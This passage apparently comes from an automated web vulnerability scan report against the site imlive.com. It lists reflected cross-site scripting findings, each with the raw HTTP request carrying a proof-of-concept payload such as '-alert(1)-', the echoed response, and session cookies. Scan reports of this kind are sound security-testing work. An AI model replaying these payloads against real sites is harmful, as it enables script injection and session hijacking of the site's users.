Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?8175d"><a>ad0c10fb84f=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.56. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb67'-alert(1)-'15501fee645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /becomehost.aspx?cbb67'-alert(1)-'15501fee645=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.57. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae13c"><a>8ef4c400f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /becomehost.aspx?ae13c"><a>8ef4c400f3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?ae13c"><a>8ef4c400f3a=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.58. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1290d'><a>0243a0c9435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryfs.asp?cat=232&1290d'><a>0243a0c9435=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:30 GMT
Connection: close
Content-Length: 18966
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232^1290d'><a>0243a0c9435=1&lr=1107816009&ud=0&pe=categoryfs.asp&qs=cat=232^1290d'>
...[SNIP]...

2.59. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61172'><a>3b9652ee722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryms.asp?cat=2&61172'><a>3b9652ee722=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:32 GMT
Connection: close
Content-Length: 21858
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2^61172'><a>3b9652ee722=1&lr=1107816009&ud=0&pe=categoryms.asp&qs=cat=2^61172'>
...[SNIP]...

2.60. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /celebrity-porn-stars/celebrity-events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db582'-alert(1)-'4b3c1d175fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /celebrity-porn-stars/celebrity-events/?db582'-alert(1)-'4b3c1d175fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 2667
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fcelebrity-porn-stars%2fcelebrity-events%2f%3fdb582'-alert(1)-'4b3c1d175fb%3d1'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

2.61. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /disclaimer.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd26f'><a>d83acef05af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /disclaimer.asp?cd26f'><a>d83acef05af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:16 GMT
Connection: close
Content-Length: 78891
Vary: Accept-Encoding


<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp?cd26f'><a>d83acef05af=1&lr=1107816009&ud=0&pe=disclaimer.asp&qs=cd26f'>
...[SNIP]...

2.62. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e80f3'-alert(1)-'c0da0968686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.aspx?e80f3'-alert(1)-'c0da0968686=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:43 GMT
Connection: close
Content-Length: 3338
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx?e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.63. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62a5"><a>8b3d580d15c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?e62a5"><a>8b3d580d15c=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OCAEMBCBLGFDAAHFKEJLGHNK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:32 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<form onsubmit="return CheckForm(this);" method="post" action="homepagems3.asp?e62a5"><a>8b3d580d15c=1" style="margin:0;" name="frmLogin" ID="frmLogin">
...[SNIP]...

2.64. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ef1f'><a>f607da23703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?6ef1f'><a>f607da23703=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
